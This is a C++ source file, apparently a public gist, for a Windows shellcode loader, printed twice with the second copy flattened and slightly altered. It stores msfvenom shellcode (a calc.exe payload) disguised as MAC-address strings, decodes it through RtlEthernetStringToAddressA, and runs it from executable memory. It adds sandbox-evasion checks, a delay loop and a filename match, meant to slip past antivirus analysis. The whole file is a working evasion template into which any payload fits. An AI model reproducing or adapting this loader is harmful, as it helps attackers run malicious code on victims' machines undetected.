caueb/itsnotmalware.cpp

## itsnotmalware.cpp
// Payload encoding using HellsShell (https://github.com/NUL0x4C/HellShell)
// Compile with clang: clang++ -w -Oz -mwindows itsnotmalware.cpp -o itsnotmalware.exe

#include "Windows.h"
#include "stdio.h"
#include <iostream>
#include <string>
#include <regex>

#define _CRT_SECURE_NO_WARNINGS
#pragma warning(disable:4996)

#define MAX_OP 89888996 // Define a constant MAX_OP with a value of 89888996

using namespace std;

// msfvenom calc.exe
char* MacArray[] = {
		"FC-48-83-E4-F0-E8", "C0-00-00-00-41-51", "41-50-52-51-56-48", "31-D2-65-48-8B-52", "60-48-8B-52-18-48", "8B-52-20-48-8B-72",
		"50-48-0F-B7-4A-4A", "4D-31-C9-48-31-C0", "AC-3C-61-7C-02-2C", "20-41-C1-C9-0D-41", "01-C1-E2-ED-52-41", "51-48-8B-52-20-8B",
		"42-3C-48-01-D0-8B", "80-88-00-00-00-48", "85-C0-74-67-48-01", "D0-50-8B-48-18-44", "8B-40-20-49-01-D0", "E3-56-48-FF-C9-41",
		"8B-34-88-48-01-D6", "4D-31-C9-48-31-C0", "AC-41-C1-C9-0D-41", "01-C1-38-E0-75-F1", "4C-03-4C-24-08-45", "39-D1-75-D8-58-44",
		"8B-40-24-49-01-D0", "66-41-8B-0C-48-44", "8B-40-1C-49-01-D0", "41-8B-04-88-48-01", "D0-41-58-41-58-5E", "59-5A-41-58-41-59",
		"41-5A-48-83-EC-20", "41-52-FF-E0-58-41", "59-5A-48-8B-12-E9", "57-FF-FF-FF-5D-48", "BA-01-00-00-00-00", "00-00-00-48-8D-8D",
		"01-01-00-00-41-BA", "31-8B-6F-87-FF-D5", "BB-F0-B5-A2-56-41", "BA-A6-95-BD-9D-FF", "D5-48-83-C4-28-3C", "06-7C-0A-80-FB-E0",
		"75-05-BB-47-13-72", "6F-6A-00-59-41-89", "DA-FF-D5-63-61-6C", "63-2E-65-78-65-00"
};

#define NumberOfElements 46

typedef NTSTATUS(NTAPI* fnRtlEthernetStringToAddressA)(
	PCSTR			S,
	PCSTR* Terminator,
	PVOID			Addr
	);

BOOL checkSandbox() {
	char path [MAX_PATH]; // Declare a character array to hold the file path
    int cpt = 0;
    int i = 0;
    for (i = 0; i < MAX_OP; i++)
    {
        cpt++;
    }
    if (cpt == MAX_OP)
	{
        GetModuleFileName(NULL, path, MAX_PATH);
        regex str_expr ("(.*)(itsnotmalware)(.*)"); // Regex to find "itsnotmalware"
        if (regex_match (path,str_expr))			// Check if the file path matches the regular expression pattern
		{
			return TRUE;
        }
		return FALSE;
    }
    return FALSE;
}


BOOL MacDeobfuscation(IN CHAR* MacArray[], IN SIZE_T NmbrOfElements, OUT PBYTE * ppDAddress, OUT SIZE_T * pDSize) {

		PBYTE		pBuffer		= NULL,
  					TmpBuffer	= NULL;
		SIZE_T		sBuffSize	= NULL;
		PCSTR		Terminator	= NULL;
		NTSTATUS	STATUS		= NULL;

		fnRtlEthernetStringToAddressA  pRtlEthernetStringToAddressA  = (fnRtlEthernetStringToAddressA)GetProcAddress(GetModuleHandle(TEXT("NTDLL")), "RtlEthernetStringToAddressA");
		if (pRtlEthernetStringToAddressA  == NULL) {
				printf("[!] GetProcAddress Failed With Error : %d \n", GetLastError());
				return FALSE;
		}

		sBuffSize = NmbrOfElements * 6;

		pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), 0, sBuffSize);
		if (pBuffer == NULL) {
			printf("[!] HeapAlloc Failed With Error : %d \n", GetLastError());
			return FALSE;
		}

		TmpBuffer = pBuffer;


		for (int i = 0; i < NmbrOfElements; i++) {

			if ((STATUS = pRtlEthernetStringToAddressA(MacArray[i], &Terminator, TmpBuffer)) != 0x0) {
				printf("[!] RtlEthernetStringToAddressA  Failed At [%s] With Error 0x%0.8X\n", MacArray[i], STATUS);
				return FALSE;
			}

			TmpBuffer = (PBYTE)(TmpBuffer + 6);
		}

		*ppDAddress = pBuffer;
		*pDSize = sBuffSize;
		return TRUE;
}


int main() {

    PBYTE       pDeobfuscatedPayload = NULL;
    SIZE_T      sDeobfuscatedSize = NULL;

	if (!checkSandbox()) {
		printf("[-] Name of the program running is different...exit...\n");
		return -1;
	};

	// Decode the shellcode
	if (!MacDeobfuscation(MacArray, NumberOfElements, &pDeobfuscatedPayload, &sDeobfuscatedSize)) {
		printf("[-] Decoding error!\n");
		return -1;
	}

	// Allocate memory for the decrypted MSF-Shellcode
	void* exec = VirtualAlloc(0, sDeobfuscatedSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	// Copy the MSF-Shellcode into the allocated memory
	memcpy(exec, pDeobfuscatedPayload, sDeobfuscatedSize);

	// Execute the decrypted MSF-Shellcode in memory
	((void(*)())exec)();

    return 0;
}
	// Payload encoding using HellsShell (https://github.com/NUL0x4C/HellShell)
	// Compile with clang: clang++ -w -Oz -mwindows itsnotmalware.cpp -o itsnotmalware.exe

	#include "Windows.h"
	#include "stdio.h"
	#include <iostream>
	#include <string>
	#include <regex>

	#define _CRT_SECURE_NO_WARNINGS
	#pragma warning(disable:4996)

	#define MAX_OP 89888996 // Define a constant MAX_OP with a value of 89888996

	using namespace std;

	// msfvenom calc.exe
	char* MacArray[] = {
	"FC-48-83-E4-F0-E8", "C0-00-00-00-41-51", "41-50-52-51-56-48", "31-D2-65-48-8B-52", "60-48-8B-52-18-48", "8B-52-20-48-8B-72",
	"50-48-0F-B7-4A-4A", "4D-31-C9-48-31-C0", "AC-3C-61-7C-02-2C", "20-41-C1-C9-0D-41", "01-C1-E2-ED-52-41", "51-48-8B-52-20-8B",
	"42-3C-48-01-D0-8B", "80-88-00-00-00-48", "85-C0-74-67-48-01", "D0-50-8B-48-18-44", "8B-40-20-49-01-D0", "E3-56-48-FF-C9-41",
	"8B-34-88-48-01-D6", "4D-31-C9-48-31-C0", "AC-41-C1-C9-0D-41", "01-C1-38-E0-75-F1", "4C-03-4C-24-08-45", "39-D1-75-D8-58-44",
	"8B-40-24-49-01-D0", "66-41-8B-0C-48-44", "8B-40-1C-49-01-D0", "41-8B-04-88-48-01", "D0-41-58-41-58-5E", "59-5A-41-58-41-59",
	"41-5A-48-83-EC-20", "41-52-FF-E0-58-41", "59-5A-48-8B-12-E9", "57-FF-FF-FF-5D-48", "BA-01-00-00-00-00", "00-00-00-48-8D-8D",
	"01-01-00-00-41-BA", "31-8B-6F-87-FF-D5", "BB-F0-B5-A2-56-41", "BA-A6-95-BD-9D-FF", "D5-48-83-C4-28-3C", "06-7C-0A-80-FB-E0",
	"75-05-BB-47-13-72", "6F-6A-00-59-41-89", "DA-FF-D5-63-61-6C", "63-2E-65-78-65-00"
	};

	#define NumberOfElements 46

	typedef NTSTATUS(NTAPI* fnRtlEthernetStringToAddressA)(
	PCSTR S,
	PCSTR* Terminator,
	PVOID Addr
	);

	BOOL checkSandbox() {
	char path [MAX_PATH]; // Declare a character array to hold the file path
	int cpt = 0;
	int i = 0;
	for (i = 0; i < MAX_OP; i++)
	{
	cpt++;
	}
	if (cpt == MAX_OP)
	{
	GetModuleFileName(NULL, path, MAX_PATH);
	regex str_expr ("(.)(itsnotmalware)(.)"); // Regex to find "itsnotmalware"
	if (regex_match (path,str_expr)) // Check if the file path matches the regular expression pattern
	{
	return TRUE;
	}
	return FALSE;
	}
	return FALSE;
	}


	BOOL MacDeobfuscation(IN CHAR* MacArray[], IN SIZE_T NmbrOfElements, OUT PBYTE * ppDAddress, OUT SIZE_T * pDSize) {

	PBYTE pBuffer = NULL,
	TmpBuffer = NULL;
	SIZE_T sBuffSize = NULL;
	PCSTR Terminator = NULL;
	NTSTATUS STATUS = NULL;

	fnRtlEthernetStringToAddressA pRtlEthernetStringToAddressA = (fnRtlEthernetStringToAddressA)GetProcAddress(GetModuleHandle(TEXT("NTDLL")), "RtlEthernetStringToAddressA");
	if (pRtlEthernetStringToAddressA == NULL) {
	printf("[!] GetProcAddress Failed With Error : %d \n", GetLastError());
	return FALSE;
	}

	sBuffSize = NmbrOfElements * 6;

	pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), 0, sBuffSize);
	if (pBuffer == NULL) {
	printf("[!] HeapAlloc Failed With Error : %d \n", GetLastError());
	return FALSE;
	}

	TmpBuffer = pBuffer;


	for (int i = 0; i < NmbrOfElements; i++) {

	if ((STATUS = pRtlEthernetStringToAddressA(MacArray[i], &Terminator, TmpBuffer)) != 0x0) {
	printf("[!] RtlEthernetStringToAddressA Failed At [%s] With Error 0x%0.8X\n", MacArray[i], STATUS);
	return FALSE;
	}

	TmpBuffer = (PBYTE)(TmpBuffer + 6);
	}

	*ppDAddress = pBuffer;
	*pDSize = sBuffSize;
	return TRUE;
	}


	int main() {

	PBYTE pDeobfuscatedPayload = NULL;
	SIZE_T sDeobfuscatedSize = NULL;

	if (!checkSandbox()) {
	printf("[-] Name of the program running is different...exit...\n");
	return -1;
	};

	// Decode the shellcode
	if (!MacDeobfuscation(MacArray, NumberOfElements, &pDeobfuscatedPayload, &sDeobfuscatedSize)) {
	printf("[-] Decoding error!\n");
	return -1;
	}

	// Allocate memory for the decrypted MSF-Shellcode
	void* exec = VirtualAlloc(0, sDeobfuscatedSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	// Copy the MSF-Shellcode into the allocated memory
	memcpy(exec, pDeobfuscatedPayload, sDeobfuscatedSize);

	// Execute the decrypted MSF-Shellcode in memory
	((void(*)())exec)();

	return 0;
	}